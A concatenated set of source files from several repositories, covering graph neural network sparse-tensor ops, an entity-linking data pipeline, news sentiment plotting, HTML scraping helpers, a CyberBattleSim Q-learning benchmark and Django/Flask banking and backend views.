If a is a square matrix, computes a^k. If a is a rank 3 Tensor of square
matrices, computes the exponent of each inner matrix.
:param a: Tensor or SparseTensor with rank 2 or 3. The innermost two
dimensions must be the same.
:param k: int, the exponent to which to raise the matrices.
:return: Tensor or SparseTensor with same rank as the input.
"""
x_k = a
for _ in range(k - 1):
x_k = modal_dot(a, x_k)
return x_k
```
#### File: layers/ops/sparse.py
```python
import tensorflow as tf
from tensorflow.python.ops import gen_sparse_ops
from . import ops
def add_self_loops(a, fill=1.0):
"""
Adds self-loops to the given adjacency matrix. Self-loops are added only for
those node that don't have a self-loop already, and are assigned a weight
of `fill`.
:param a: a square SparseTensor.
:param fill: the fill value for the new self-loops. It will be cast to the
dtype of `a`.
:return: a SparseTensor with the same shape as the input.
"""
indices = a.indices
values = a.values
N = tf.shape(a, out_type=indices.dtype)[0]
mask_od = indices[:, 0] != indices[:, 1]
mask_sl = ~mask_od
mask_od.set_shape([None]) # For compatibility with TF 2.2
mask_sl.set_shape([None])
indices_od = indices[mask_od]
indices_sl = indices[mask_sl]
values_sl = tf.fill((N,), tf.cast(fill, values.dtype))
values_sl = tf.tensor_scatter_nd_update(
values_sl, indices_sl[:, 0:1], values[mask_sl]
)
indices_sl = tf.range(N, dtype=indices.dtype)[:, None]
indices_sl = tf.repeat(indices_sl, 2, -1)
indices = tf.concat((indices_od, indices_sl), 0)
values_od = values[mask_od]
values = tf.concat((values_od, values_sl), 0)
out = tf.SparseTensor(indices, values, (N, N))
return tf.sparse.reorder(out)
def add_self_loops_indices(indices, n_nodes=None):
"""
Given the indices of a square SparseTensor, adds the diagonal entries (i, i)
and returns the reordered indices.
:param indices: Tensor of rank 2, the indices to a SparseTensor.
:param n_nodes: the size of the n_nodes x n_nodes SparseTensor indexed by
the indices. If `None`, n_nodes is calculated as the maximum entry in the
indices plus 1.
:return: Tensor of rank 2, the indices to a SparseTensor.
"""
n_nodes = tf.reduce_max(indices) + 1 if n_nodes is None else n_nodes
row, col = indices[..., 0], indices[..., 1]
mask = tf.ensure_shape(row != col, row.shape)
sl_indices = tf.range(n_nodes, dtype=row.dtype)[:, None]
sl_indices = tf.repeat(sl_indices, 2, -1)
indices = tf.concat((indices[mask], sl_indices), 0)
dummy_values = tf.ones_like(indices[:, 0])
indices, _ = gen_sparse_ops.sparse_reorder(
indices, dummy_values, (n_nodes, n_nodes)
)
return indices
def _square_size(dense_shape):
dense_shape = tf.unstack(dense_shape)
size = dense_shape[0]
for d in dense_shape[1:]:
tf.debugging.assert_equal(size, d)
return size
def _indices_to_inverse_map(indices, size):
"""
Compute inverse indices of a gather.
:param indices: Tensor, forward indices, rank 1
:param size: Tensor, size of pre-gathered input, rank 0
:return: Tensor, inverse indices, shape [size]. Zero values everywhere
except at indices.
"""
indices = tf.cast(indices, tf.int64)
size = tf.cast(size, tf.int64)
return tf.scatter_nd(
tf.expand_dims(indices, axis=-1),
tf.range(tf.shape(indices, out_type=tf.int64)[0]),
tf.expand_dims(size, axis=-1),
)
def _boolean_mask_sparse(a, mask, axis, inverse_map, out_size):
"""
SparseTensor equivalent to tf.boolean_mask.
:param a: SparseTensor of rank k and nnz non-zeros.
:param mask: rank-1 bool Tensor.
:param axis: int, axis on which to mask. Must be in [-k, k).
:param out_size: number of true entires in mask. Computed if not given.
:return masked_a: SparseTensor masked along the given axis.
:return values_mask: bool Tensor indicating surviving edges, shape [nnz].
"""
mask = tf.convert_to_tensor(mask)
values_mask = tf.gather(mask, a.indices[:, axis], axis=0)
dense_shape = tf.tensor_scatter_nd_update(a.dense_shape, [[axis]], [out_size])
indices = tf.boolean_mask(a.indices, values_mask)
indices = tf.unstack(indices, axis=-1)
indices[axis] = tf.gather(inverse_map, indices[axis])
indices = tf.stack(indices, axis=-1)
a = tf.SparseTensor(
indices,
tf.boolean_mask(a.values, values_mask),
dense_shape,
)
return (a, values_mask)
def _boolean_mask_sparse_square(a, mask, inverse_map, out_size):
"""
Apply boolean_mask to every axis of a SparseTensor.
:param a: SparseTensor with uniform dimensions and nnz non-zeros.
:param mask: boolean mask.
:param inverse_map: Tensor of new indices, shape [nnz]. Computed if None.
:out_size: number of True values in mask. Computed if None.
:return a: SparseTensor with uniform dimensions.
:return values_mask: bool Tensor of shape [nnz] indicating valid edges.
"""
mask = tf.convert_to_tensor(mask)
values_mask = tf.reduce_all(tf.gather(mask, a.indices, axis=0), axis=-1)
dense_shape = [out_size] * a.shape.ndims
indices = tf.boolean_mask(a.indices, values_mask)
indices = tf.gather(inverse_map, indices)
a = tf.SparseTensor(indices, tf.boolean_mask(a.values, values_mask), dense_shape)
return (a, values_mask)
def boolean_mask_sparse(a, mask, axis=0):
"""
SparseTensor equivalent to tf.boolean_mask.
:param a: SparseTensor of rank k and nnz non-zeros.
:param mask: rank-1 bool Tensor.
:param axis: int, axis on which to mask. Must be in [-k, k).
:return masked_a: SparseTensor masked along the given axis.
:return values_mask: bool Tensor indicating surviving values, shape [nnz].
"""
i = tf.squeeze(tf.where(mask), axis=1)
out_size = tf.math.count_nonzero(mask)
in_size = a.dense_shape[axis]
inverse_map = _indices_to_inverse_map(i, in_size)
return _boolean_mask_sparse(
a, mask, axis=axis, inverse_map=inverse_map, out_size=out_size
)
def boolean_mask_sparse_square(a, mask):
"""
Apply mask to every axis of SparseTensor a.
:param a: SparseTensor, square, nnz non-zeros.
:param mask: boolean mask with size equal to each dimension of a.
:return masked_a: SparseTensor
:return values_mask: bool tensor of shape [nnz] indicating valid values.
"""
i = tf.squeeze(tf.where(mask), axis=-1)
out_size = tf.size(i)
in_size = _square_size(a.dense_shape)
inverse_map = _indices_to_inverse_map(i, in_size)
return _boolean_mask_sparse_square(
a, mask, inverse_map=inverse_map, out_size=out_size
)
def gather_sparse(a, indices, axis=0, mask=None):
"""
SparseTensor equivalent to tf.gather, assuming indices are sorted.
:param a: SparseTensor of rank k and nnz non-zeros.
:param indices: rank-1 int Tensor, rows or columns to keep.
:param axis: int axis to apply gather to.
:param mask: boolean mask corresponding to indices. Computed if not provided.
:return gathered_a: SparseTensor masked along the given axis.
:return values_mask: bool Tensor indicating surviving values, shape [nnz].
"""
in_size = _square_size(a.dense_shape)
out_size = tf.size(indices)
if mask is None:
mask = ops.indices_to_mask(indices, in_size)
inverse_map = _indices_to_inverse_map(indices, in_size)
return _boolean_mask_sparse(
a, mask, axis=axis, inverse_map=inverse_map, out_size=out_size
)
def gather_sparse_square(a, indices, mask=None):
"""
Gather on every axis of a SparseTensor.
:param a: SparseTensor of rank k and nnz non-zeros.
:param indices: rank-1 int Tensor, rows and columns to keep.
:param mask: boolean mask corresponding to indices. Computed if not provided.
:return gathered_a: SparseTensor of the gathered input.
:return values_mask: bool Tensor indicating surviving values, shape [nnz].
"""
in_size = _square_size(a.dense_shape)
out_size = tf.size(indices)
if mask is None:
mask = ops.indices_to_mask(indices, in_size)
inverse_map = _indices_to_inverse_map(indices, in_size)
return _boolean_mask_sparse_square(
a, mask, inverse_map=inverse_map, out_size=out_size
)
```
#### File: spektral/transforms/clustering_coefficient.py
```python
import networkx as nx
import numpy as np
class ClusteringCoeff:
"""
Concatenates to each node attribute the clustering coefficient of the
corresponding node.
"""
def __call__(self, graph):
if "a" not in graph:
raise ValueError("The graph must have an adjacency matrix")
clustering_coeff = nx.clustering(nx.Graph(graph.a))
clustering_coeff = np.array(
[clustering_coeff[i] for i in range(graph.n_nodes)]
)[:, None]
if "x" not in graph:
graph.x = clustering_coeff
else:
graph.x = np.concatenate((graph.x, clustering_coeff), axis=-1)
return graph
```
#### File: spektral/transforms/normalize_sphere.py
```python
import numpy as np
class NormalizeSphere:
r"""
Normalizes the node attributes so that they are centered at the origin and
contained within a sphere of radius 1:
$$
\X_{i} \leftarrow \frac{\X_{i} - \bar\X}{\max_{i,j} \X_{ij}}
$$
where \( \bar\X \) is the centroid of the node features.
"""
def __call__(self, graph):
offset = np.mean(graph.x, -2, keepdims=True)
scale = np.abs(graph.x).max()
graph.x = (graph.x - offset) / scale
return graph
```
#### File: tests/test_models/test_general_gnn.py
```python
from spektral import models
from tests.test_models.core import MODES, run_model
config = {
"model": models.GeneralGNN,
"modes": [MODES["SINGLE"], MODES["DISJOINT"], MODES["MIXED"]],
"kwargs": {"output": 32, "connectivity": "cat", "pool": "sum"},
"edges": False,
"dense": False,
"sparse": True,
}
def test_model():
run_model(config)
config["kwargs"]["pool"] = None
run_model(config)
config["kwargs"]["connectivity"] = "sum"
run_model(config)
config["kwargs"]["connectivity"] = None
run_model(config)
``` |
{
"source": "JonaBenja/el_for_cnd",
"score": 3
} |
#### File: el_for_cnd/src/datascraper.py
```python
from elasticsearch import Elasticsearch
from elasticsearch.helpers import scan
import pandas as pd
def scrape_companies(es):
"""Function to scrape KvK numbers and additional information from companies"""
# Prepare variables
es_index = "nen-pilot-companies"
nen_companies = []
# Do not exlude any queries
es_query = {"query": {"match_all": {}}}
# Save every company entry from the scrape in a list
for hit in scan(es, index=es_index, query=es_query):
nen_companies.append(hit['_source'])
# Transform result in pandas DataFrame
nen_companies = pd.DataFrame(nen_companies)
print(f"Scraped {len(nen_companies)} companies")
return nen_companies
def scrape_news(es):
"""Function to scrape news articles and metadata"""
# Prepare variables
es_index = "nen-pilot-news"
nen_news = []
# Specify query for scraping the news articles
es_query = {"query": {
"bool": {
"must": [],
"filter": [
{
"match_all": {}
},
{
"exists": {
# Take news articles that include organizations
"field": "resolved_orgs.keyword"
}
},
{
"exists": {
# Make sure the full text of the article is available
"field": "full_text",
}
},
{ # Make sure the title of the article is available
"exists": {
"field": "title",
}
},
{
"match_phrase": {
"language.keyword": {
# Take only Dutch articles
"query": "nl"
}
}
},
{
"range": {
"publish_date": {
# Take only recent articles
"format": "strict_date_optional_time",
"gte": "2021-01-06T16:16:38.151Z",
"lte": "2021-04-06T15:16:38.151Z"
}
}
}
],
"should": [],
"must_not": []
}}}
# Add all relevant news articles to list
for hit in scan(es, index=es_index, query=es_query):
nen_news.append(hit['_source'])
# Transform list into pandas DataFrame
nen_news = pd.DataFrame(nen_news)
print(f"Scraped {nen_news.shape[0]} news articles")
return nen_news
def main():
# Set up Elastic Search
es = Elasticsearch(
["https://search.brainial.com/"],
http_auth=("esuser", "ww_2<PASSWORD>"),
scheme="https",
port=443,
)
# Scrape company information and save it as a tsv file
nen_companies = scrape_companies(es)
nen_companies.to_csv('../../data/model_data/nen_companies.tsv', sep='\t')
# Scrape news articles and save them as a tsv file
nen_news = scrape_news(es)
nen_news.to_csv('../../data/model_data/nen_news.tsv', sep='\t')
if __name__ == '__main__':
main()
```
#### File: el_for_cnd/src/data_statistics.py
```python
from utils import *
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
from collections import Counter
import csv
import spacy
from spacy.kb import KnowledgeBase
import seaborn as sns
def count_mentions(articles, nlp):
"""Function to count the number of organization mentions in the news articles"""
# Prepare variables
n_articles = 0
n_mentions = 0
n_org_articles = 0
n_org_mentions = 0
i = 0
# Go through all news articles
for article in articles:
i += 1
# Pring progress
if i%100 == 0:
print(f"{i} articles counted.")
# Transform article to spaCy doc
doc = nlp(article)
# Count all unique named entities
entities = set([ent.text for ent in doc.ents])
if entities:
n_mentions += len(entities)
n_articles += 1
# Count all unique organizations
org_entities = set([ent.text for ent in doc.ents if ent.label_ in ['ORG', 'NORP']])
if org_entities:
n_org_mentions += len(org_entities)
n_org_articles += 1
# Print statistics
print(f"{i} articles in total.")
print(f"{n_mentions} named entities in {n_articles} articles.")
print(f"{n_org_mentions} campany mentions in {n_org_articles} articles.")
def get_statistics():
"""Function to load data and execute the count mentions function"""
nlp = spacy.load('../resources/nen_nlp')
news = pd.read_csv('../data/model_data/prepro_news.tsv', sep='\t')
count_mentions(news['full_text'], nlp)
def get_distribution():
"""Function to plot the number times a KvK-number occurs in the data"""
# Load data
training_data = "../data/model_data/all_data.tsv"
training_df = pd.read_csv(training_data, sep='\t')
# Extract all KvK-numbers
orgs = [org for org in training_df['label'] if org != 'NIL']
#orgs = ['0'+org for org in orgs if len(org) == 7]
# Count their occurrences and extract the 20 most common
org_count = Counter(orgs)
most_orgs = org_count.most_common(20)
orgis = []
percs = []
# Save the first name of the companies that belong to the KvK-numbers
entity_loc = "../data/model_data/entities.tsv"
id_dict = dict()
with open(entity_loc, "r", encoding="utf8") as csvfile:
csvreader = csv.reader(csvfile, delimiter="\t")
for row in csvreader:
id_dict[row[0]] = (row[1], row[2], row[3])
# Transform numbers into percentages
for org, count in most_orgs:
orgis.append(f"{id_dict[str(org)][0]} ({org})")
perc = count/len(orgs)*100
percs.append(perc)
# Create barplot
df = pd.DataFrame(list(zip(orgis, percs)),
columns=['Company', 'Percentage of annotations'])
sns.barplot(y='Company', x='Percentage of annotations', data=df)
plt.show()
"""
sns.set(color_codes=True)
x = 'org'
(training_df
.groupby(x)[y]
.value_counts(normalize=True)
.mul(100)
.rename('percent')
.reset_index()
.pipe((sns.catplot, 'data'), x=x, y='percent', hue=y, kind='bar'))
#plt.show()
"""
def evaluation_graph():
"""Creates a plot showing the scores on the test set"""
system = ["Entity Linker", "baseline", "baseline+context"]
accuracy = [0.800, 0.599, 0.571]
f_score = [0.379, 0.300, 0.289]
x = np.arange(len(system)) # the label locations
width = 0.35 # the width of the bars
fig, ax = plt.subplots()
rects1 = ax.bar(x - width / 2, accuracy, width, label='micro F-score', color='#2e79ff')
rects2 = ax.bar(x + width / 2, f_score, width, label='macro F-score', color='#abc9ff')
hfont = {'fontname': 'Helvetica'}
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('Scores', **hfont)
ax.set_title('Results on development set', **hfont)
ax.set_xticks(x)
ax.set_ylim([0, 1])
ax.set_xticklabels(system, **hfont)
ax.legend()
ax.bar_label(rects1, padding=3)
ax.bar_label(rects2, padding=3)
fig.tight_layout()
plt.show()
def n_candidates():
"""Creates a plot showing the number of samples and the number of candidates"""
# Load data and resources
data = "../data/model_data/all_data.tsv"
data = pd.read_csv(data, sep='\t')
orgs = data['org']
nlp = spacy.load('resources/nen_nlp')
new_kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
new_kb.load_bulk('resources/kb_probs')
# Count the number of candidates per alias
n_cands = []
for org in orgs:
candids = new_kb.get_candidates(org)
n_cands.append(len(candids))
# Plot the number of mentions and the number of candidates
data_candids = pd.DataFrame(n_cands, columns=['n_of_candidates'])
sns.countplot(x='n_of_candidates', data=data_candids)
plt.show()
def main():
get_statistics()
get_distribution()
evaluation_graph()
#n_candidates()
if __name__ == '__main__':
main()
```
#### File: el_for_cnd/src/iaa-annotations.py
```python
import json
import jsonlines
import spacy
from spacy.kb import KnowledgeBase
def save_500():
# Prepare datafiles
json_loc = "../../data/prodigy_data/annotations_input.jsonl"
new_loc = "../../data/prodigy_data/iaa_input.jsonl"
# Prepare resources
nlp = spacy.load('../resources/nen_nlp')
kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
kb.load_bulk('../resources/kb_initial')
i = 0
j = 0
unique_orgs = []
limit = 400
# Open file to save IAA-annotations in
outfile = jsonlines.open(new_loc, 'w')
# Go through all annotations
with open(json_loc, 'r', encoding='utf8') as jsonfile:
for line in jsonfile:
example = json.loads(line)
org = example['org']
if len(kb.get_candidates(org)) > 1:
i += 1
if i > 4070 and org not in unique_orgs and j < limit:
j += 1
outfile.write(example)
unique_orgs.append(org)
print(j, ", sample: ", i)
outfile.close()
print(f"{limit} IAA-annotations Prodigy input saved in ../prodigy/iaa_input.jsonl")
def main():
save_500()
if __name__ == '__main__':
main()
```
#### File: el_for_cnd/src/probs_kb.py
```python
import spacy
from spacy.kb import KnowledgeBase
from collections import defaultdict
def get_prior_probs(candidates, alias_dict):
"""
Get prior probabilities of all candidates for a mention
:param candidates: the list of candidates for a company mention
:param alias_dict:
:return:
"""
prior_probs = []
candids = []
total = sum(alias_dict[cand] for cand in alias_dict)
for cand in candidates:
if cand in alias_dict:
prob = alias_dict[cand] / total
else:
prob = 0
candids.append(cand)
prior_probs.append(prob)
return candids, prior_probs
def add_aliases(cands_dict, old_kb, new_kb):
for alias in old_kb.get_alias_strings():
candids = old_kb.get_candidates(alias)
candidates = [cand.entity_ for cand in candids]
if alias in cands_dict:
candidates, prior_probs = get_prior_probs(candidates, cands_dict[alias])
print(prior_probs)
#else:
#prior_probs = [old_kb.get_prior_prob(cand.entity_, alias) for cand in candids]
new_kb.add_alias(alias, candidates, prior_probs)
return new_kb
def save_candidates(datapath):
"""
:param datapath: path to all data
:return:
"""
cands_dict = dict()
i = 0
with open(datapath, 'r', encoding='utf8') as infile:
for line in infile:
line = line.replace('\n', '').split('\t')
if line[0] != 'context' and line[-1] != 'NIL':
if i % 100 == 0:
print(f"{i} samples preprocessed.")
i += 1
alias = line[2]
entity = line[-1]
if alias not in cands_dict:
cands_dict[alias] = defaultdict(int)
cands_dict[alias][entity] += 1
return cands_dict
def redefine_kb():
"""
:return:
"""
# Preprare resources
nlp = spacy.load('resources/nen_nlp')
old_kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
old_kb.load_bulk('resources/kb_initial')
# Create new Knowledge Base, with the entities from the comapany database
new_kb = KnowledgeBase(vocab=nlp.vocab, entity_vector_length=96)
new_kb.load_bulk('resources/kb_entities')
# Load data
datapath = "../data/model_data/all_data.tsv"
# Find candidates and number of occurrences
cands_dict = save_candidates(datapath)
# Add aliases to KB
new_kb = add_aliases(cands_dict, old_kb, new_kb)
print(f"Added {new_kb.get_size_aliases()} aliases to KB and their prior probabilities.")
# Save new KB
new_kb.dump("../resources/kb_probs")
def main():
redefine_kb()
if __name__ == "__main__":
main()
``` |
{
"source": "JonaBenja/lad-assignment1",
"score": 3
} |
#### File: lad-assignment1/code/sentiment.py
```python
from polyglot.text import Text
from statistics import mean
import pandas as pd
from collections import defaultdict, Counter
import matplotlib.pyplot as plt
import numpy as np
"""
DUTCH
"""
# Prepare dictionaries
sents_sentiment = defaultdict(list)
# Read in data
tsv_file = "../data/nl/decoded_nl_greta_overview.tsv"
content = pd.read_csv(tsv_file, sep="\t", keep_default_na=False, header=0, encoding = 'utf-8')
articles = content['Text']
publishers = content['Publisher']
# Save mean sentiment of sentences per article
for text, publisher in zip(articles, publishers):
text = ''.join(x for x in text if x.isprintable())
sentences = Text(text, hint_language_code = 'nl').sentences
sent_senti = float(mean([sent.polarity for sent in sentences]))
sents_sentiment[publisher].append(sent_senti)
art_pub_sent = defaultdict(dict)
for publisher in sents_sentiment:
art_pub_sent[publisher] = mean(sents_sentiment[publisher])
d = sents_sentiment
top10_publishers = sorted(d, key=lambda k: len(d[k]), reverse=True)[:10]
publishers = top10_publishers
sentiment = [art_pub_sent[publisher] for publisher in top10_publishers]
x = np.arange(len(publishers)) # the label locations
width = 0.50 # the width of the bars
fig, ax = plt.subplots(1, 1, figsize = (16, 6))
rects1 = ax.bar(x - width/2, sentiment, width, label='Men')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('SENTIMENT')
ax.set_xlabel('PUBLISHER')
ax.set_title('MEAN ARTICLE SENTIMENT OF DUTCH PUBLISHERS')
ax.set_xticks(x)
ax.set_xticklabels(publishers)
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect, publisher in zip(rects, top10_publishers):
label = len(sents_sentiment[publisher])
height = rect.get_height()
ax.annotate('{}'.format(label),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
autolabel(rects1)
fig.tight_layout()
plt.show()
fig.savefig("../data/plots/nl_publisher_sentiment.png")
"""
ITALIAN
"""
sents_sentiment = defaultdict(list)
tsv_file = "../data/it/it_greta_overview.tsv"
content = pd.read_csv(tsv_file, sep="\t", keep_default_na=False, header=0, encoding = 'utf-8')
articles = content['Text']
publishers = content['Publisher']
# Save mean sentiment of sentences per article
for text, publisher in zip(articles, publishers):
if publisher == 'la Repubblica':
publisher = 'La Repubblica'
text = ''.join(x for x in text if x.isprintable())
sentences = Text(text, hint_language_code = 'it').sentences
sent_senti = float(mean([sent.polarity for sent in sentences]))
sents_sentiment[publisher].append(sent_senti)
art_pub_sent = defaultdict(dict)
for publisher in sents_sentiment:
art_pub_sent[publisher] = mean(sents_sentiment[publisher])
d = sents_sentiment
top10_publishers = sorted(d, key=lambda k: len(d[k]), reverse=True)[:10]
"""
SENTIMENT PLOT
"""
publishers = top10_publishers
sentiment = [art_pub_sent[publisher] for publisher in top10_publishers]
x = np.arange(len(publishers)) # the label locations
width = 0.50 # the width of the bars
fig, ax = plt.subplots(1, 1, figsize = (16, 6))
rects1 = ax.bar(x - width/2, sentiment, width, label='Men')
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel('SENTIMENT')
ax.set_xlabel('PUBLISHER')
ax.set_title('MEAN ARTICLE SENTIMENT OF ITALIAN PUBLISHERS')
ax.set_xticks(x)
ax.set_xticklabels(publishers)
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect, publisher in zip(rects, top10_publishers):
label = len(sents_sentiment[publisher])
height = rect.get_height()
ax.annotate('{}'.format(label),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
autolabel(rects1)
fig.tight_layout()
plt.show()
fig.savefig("../data/plots/it_publisher_sentiment.png")
```
#### File: lad-assignment1/code/util_html.py
```python
import requests
import re
from bs4 import BeautifulSoup
def url_to_string(url):
"""
Extracts the raw text from a web page.
It takes a URL string as input and returns the text.
"""
parser_content = url_to_html(url)
return html_to_string(parser_content)
def html_to_string(parser_content):
"""Extracts the textual content from an html object."""
# Remove scripts
for script in parser_content(["script", "style", "aside"]):
script.extract()
# This is a shorter way to write the code for removing the newlines.
# It does it in one step without intermediate variables
return " ".join(re.split(r'[\n\t]+', parser_content.get_text()))
def url_to_html(url):
"""Scrapes the html content from a web page. Takes a URL string as input and returns an html object. """
# Get the html content
res = requests.get(url, headers={"User-Agent": "XY"})
html = res.text
parser_content = BeautifulSoup(html, 'html5lib')
return parser_content
# We are looking for the author information at places where it can often be found.
# If we do not find it, it does not mean that it is not there.
def parse_author(html_content):
# Initialize variables
search_query = re.compile('author', re.IGNORECASE)
name = ""
# The author information might be encoded as a value of the attribute name
attribute = html_content.find('meta', attrs={'name': search_query})
# Or as a property
property = html_content.find('meta', property=search_query)
found_author = attribute or property
if found_author:
name = found_author['content']
# If the author name cannot be found in the metadata, we might find it as an attribute of the text.
else:
itemprop = html_content.find(attrs={'itemprop': 'author'})
byline = html_content.find(attrs={'class': 'byline'})
found_author = itemprop or byline
if found_author:
name = found_author.text
name = name.replace("by ", "")
name = name.replace("\n", "")
return name.strip()
#This function requires the HTML content of the result as an input parameter
#It returns the actual text content
def parse_news_text(html_content):
# Try to find Article Body by Semantic Tag
article = html_content.find('article')
# Otherwise, try to find Article Body by Class Name (with the largest number of paragraphs)
if not article:
articles = html_content.find_all(class_=re.compile('(body|article|main)', re.IGNORECASE))
if articles:
article = sorted(articles, key=lambda x: len(x.find_all('p')), reverse=True)[0]
# Parse text from all Paragraphs
text = []
if article:
for paragraph in [tag.text for tag in article.find_all('p')]:
if re.findall("[.,!?]", paragraph):
text.append(paragraph)
text = re.sub(r"\s+", " ", " ".join(text))
return text
def extract_metadata_googlenews(article):
# Extract the publication date
time = article.find('time')
base_url = "http://news.google.com/"
if time:
datetime = time.get('datetime')
date, time = datetime.split("T")
else:
date = ""
time = ""
# Discover the structure in the data
technical_data, title_html, publisher_html = article.find_all('a')
# Extract meta data
publisher = publisher_html.contents[0]
title = title_html.contents[0]
url = title_html.get('href')
# The URL is a redirect from the Google page. Let's re-create the original URL form this
article_redirect = base_url + url
article_url = requests.get(article_redirect).url
return date, time, publisher, title, article_url
``` |
{
"source": "jonabox/CyberBattleSim",
"score": 2
} |
#### File: CyberBattleSim/server/script.py
```python
import sys
import logging
from typing import cast
import gym
import numpy as np
import matplotlib.pyplot as plt # type:ignore
from cyberbattle.agents.baseline.learner import TrainedLearner
import cyberbattle.agents.baseline.plotting as p
import cyberbattle.agents.baseline.agent_wrapper as w
import cyberbattle.agents.baseline.agent_tabularqlearning as a
from cyberbattle.agents.baseline.agent_wrapper import Verbosity
import cyberbattle.agents.baseline.learner as learner
from cyberbattle._env.cyberbattle_env import AttackerGoal
logging.basicConfig(stream=sys.stdout, level=logging.ERROR, format="%(levelname)s: %(message)s")
# Benchmark parameters:
# Parameters from DeepDoubleQ paper
# - learning_rate = 0.00025
# - linear epsilon decay
# - gamma = 0.99
# Eliminated gamma_values
# 0.0,
# 0.0015, # too small
# 0.15, # too big
# 0.25, # too big
# 0.35, # too big
#
# NOTE: Given the relatively low number of training episodes (50,
# a high learning rate of .99 gives better result
# than a lower learning rate of 0.25 (i.e. maximal rewards reached faster on average).
# Ideally we should decay the learning rate just like gamma and train over a
# much larger number of episodes
cyberbattlechain_10 = gym.make('CyberBattleChain-v0', attacker_goal=AttackerGoal(own_atleast_percent=1.0))
ep = w.EnvironmentBounds.of_identifiers(
maximum_node_count=12,
maximum_total_credentials=12,
identifiers=cyberbattlechain_10.identifiers
)
iteration_count = 9000
training_episode_count = 5
eval_episode_count = 5
gamma_sweep = [
0.015, # about right
]
def qlearning_run(gamma, gym_env):
"""Execute one run of the q-learning algorithm for the
specified gamma value"""
return learner.epsilon_greedy_search(
gym_env,
ep,
a.QTabularLearner(ep, gamma=gamma, learning_rate=0.90, exploit_percentile=100),
episode_count=training_episode_count,
iteration_count=iteration_count,
epsilon=0.90,
render=False,
epsilon_multdecay=0.75, # 0.999,
epsilon_minimum=0.01,
verbosity=Verbosity.Quiet,
title="Q-learning"
)
# Run Q-learning with gamma-sweep
qlearning_results = [qlearning_run(gamma, cyberbattlechain_10) for gamma in gamma_sweep]
qlearning_bestrun_10 = qlearning_results[0]
p.new_plot_loss()
for results in qlearning_results:
p.plot_all_episodes_loss(cast(a.QTabularLearner, results['learner']).loss_qsource.all_episodes, 'Q_source', results['title'])
p.plot_all_episodes_loss(cast(a.QTabularLearner, results['learner']).loss_qattack.all_episodes, 'Q_attack', results['title'])
plt.legend(loc="upper right")
plt.show()
``` |
{
"source": "JonaCaste/Banco-Django",
"score": 2
} |
#### File: authApp/serializers/depositSerializer.py
```python
from authApp.models.account import Account
from authApp.models.deposit import Deposit
from authApp.models.user import User
from rest_framework import serializers
class DepositSerializer(serializers.ModelSerializer):
class Meta:
model = Deposit
fields = ['account', 'amount', 'register_date', 'note', 'depositer_name']
def to_representation(self, obj):
account = Account.objects.get(id=obj.account_id)
user = User.objects.get(id=account.user_id)
deposite = Deposit.objects.get(id=obj.id)
return {
'id' : deposite.id,
'amount' : deposite.amount,
'register_date' : deposite.register_date,
'note' : deposite.note,
'depositer_name' : deposite.note,
'account' : {
'id' : account.id,
'isActive' : account.isActive
},
'user' : {
'id' : user.id,
'name' : user.name,
'email' : user.email
}
}
```
#### File: authApp/views/depositView.py
```python
from django.conf import settings
from rest_framework import generics, status
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated
from rest_framework_simplejwt.backends import TokenBackend
from authApp.models.deposit import Deposit
from authApp.models.account import Account
from authApp.serializers.depositSerializer import DepositSerializer
from authApp.serializers.accountSerializer import AccountSerializer
class DepositDetailView(generics.RetrieveAPIView):
serializer_class = DepositSerializer
permission_classes = (IsAuthenticated,)
queryset = Deposit.objects.all()
def get(self, request, *args, **kwargs):
token = request.META.get('HTTP_AUTHORIZATION')[7:]
tokenBackend = TokenBackend(algorithm=settings.SIMPLE_JWT['ALGORITHM'])
valid_data = tokenBackend.decode(token,verify=False)
if valid_data['user_id'] != kwargs['user']:
stringResponse = {'detail':'Unauthorized Request'}
return Response(stringResponse, status=status.HTTP_401_UNAUTHORIZED)
return super().get(request, *args, **kwargs)
class DepositsAccountView(generics.ListAPIView):
serializer_class = DepositSerializer
permission_classes = (IsAuthenticated,)
def get_queryset(self):
token = self.request.META.get('HTTP_AUTHORIZATION')[7:]
tokenBackend = TokenBackend(algorithm=settings.SIMPLE_JWT['ALGORITHM'])
valid_data = tokenBackend.decode(token,verify=False)
if valid_data['user_id'] != self.kwargs['user']:
stringResponse = {'detail':'Unauthorized Request'}
return Response(stringResponse, status=status.HTTP_401_UNAUTHORIZED)
queryset = Deposit.objects.filter(account_id=self.kwargs['account'])
return queryset
class DepositCreateView(generics.CreateAPIView):
serializer_class = DepositSerializer
permission_classes = (IsAuthenticated,)
def post(self, request, *args, **kwargs):
token = request.META.get('HTTP_AUTHORIZATION')[7:]
tokenBackend = TokenBackend(algorithm=settings.SIMPLE_JWT['ALGORITHM'])
valid_data = tokenBackend.decode(token,verify=False)
if valid_data['user_id'] != request.data['user_id']:
stringResponse = {'detail':'Unauthorized Request'}
return Response(stringResponse, status=status.HTTP_401_UNAUTHORIZED)
serializer = DepositSerializer(data=request.data['deposit_data'])
serializer.is_valid(raise_exception=True)
serializer.save()
account = Account.objects.get(id=request.data['deposit_data']['account'])
account.balance += request.data['deposit_data']['amount']
account.save()
return Response("Consignación exitosa", status=status.HTTP_201_CREATED)
``` |
{
"source": "jonadaly/brood-backend",
"score": 2
} |
#### File: brood-backend/brood_backend/api.py
```python
from connexion import request
from flask import jsonify
from brood_backend.controllers import (
peck_controller,
chicken_controller,
brood_controller,
)
def get_brood_by_id(brood_id: str):
return jsonify(brood_controller.get_brood_by_uuid(brood_id))
def create_peck():
_json = request.get_json()
return jsonify(peck_controller.create_peck(_json))
def create_chicken():
_json = request.get_json()
return jsonify(chicken_controller.create_chicken(_json))
def create_brood():
_json = request.get_json()
return jsonify(brood_controller.create_brood(_json))
```
#### File: brood_backend/controllers/chicken_controller.py
```python
from uuid import uuid4
from loguru import logger
